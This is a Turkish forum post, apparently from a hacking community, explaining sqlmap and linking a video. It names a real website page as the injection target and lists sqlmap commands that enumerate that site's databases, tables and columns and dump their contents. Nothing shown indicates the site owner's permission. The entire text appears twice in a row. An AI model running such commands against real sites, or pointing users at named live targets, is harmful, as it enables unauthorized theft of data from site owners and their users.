Öncelikle herkese merhabalar ,
THT içerisinde kali linux sqlmap hakkında bir anlatım olmadığını farkettim ve sizlerle bilgimi paylaşmak istedim .
İlk olarak sqlmap nedir ?
Sorusuna yanıt verelim :
Sqlmap sql injection açığını test ve exploit etmek amacıyla hazırlanmış
bir tool yani araçtır.
Çoğunuzun kullandığı HAVİJ ile aynı işlevi görmektedir hatta bu daha gelişmişte diğebilirim sanırım .
SQLMAP Nasıl Kullanılır ?
Bu sorunun cevabını video ile yanıtladım ancak videoyu kulaklıkla son ses dinlemenizi öneririm ses konusunda biraz sıkıntı olmuş affola.
Video : https://www.youtube.com/watch?v=KOYGiyHyl0k&feature=youtu.be
Kodlar ve kısa açıklama :
|-------------------------------------------------------------------------------------------|
|Test Hedefi : http://www.reklamaru.com/content.php?id=269 |
|-------------------------------------------------------------------------------------------|
Komutlar :
sqlmap -u URL --dbs //Hedefe sql injection uygulayarak databaseleri çeker .
sqlmap -u URL -D (database) --tables // Hedefin database üzerindeki tabloları listeler.
sqlmap -u URL -D (database) -T (table) --columns // Hedefteki database'in içindeki tabloların kolonlarını çeker.
sqlmap -u URL -D (database) -T (table) --dump // Seçili database tablosunun içeriğini listeler .
THT içerisinde kali linux sqlmap hakkında bir anlatım olmadığını farkettim ve sizlerle bilgimi paylaşmak istedim .
İlk olarak sqlmap nedir ?
Sorusuna yanıt verelim :
Sqlmap sql injection açığını test ve exploit etmek amacıyla hazırlanmış
bir tool yani araçtır.
Çoğunuzun kullandığı HAVİJ ile aynı işlevi görmektedir hatta bu daha gelişmişte diğebilirim sanırım .
SQLMAP Nasıl Kullanılır ?
Bu sorunun cevabını video ile yanıtladım ancak videoyu kulaklıkla son ses dinlemenizi öneririm ses konusunda biraz sıkıntı olmuş affola.
Video : https://www.youtube.com/watch?v=KOYGiyHyl0k&feature=youtu.be
Kodlar ve kısa açıklama :
|-------------------------------------------------------------------------------------------|
|Test Hedefi : http://www.reklamaru.com/content.php?id=269 |
|-------------------------------------------------------------------------------------------|
Komutlar :
sqlmap -u URL --dbs //Hedefe sql injection uygulayarak databaseleri çeker .
sqlmap -u URL -D (database) --tables // Hedefin database üzerindeki tabloları listeler.
sqlmap -u URL -D (database) -T (table) --columns // Hedefteki database'in içindeki tabloların kolonlarını çeker.
sqlmap -u URL -D (database) -T (table) --dump // Seçili database tablosunun içeriğini listeler .
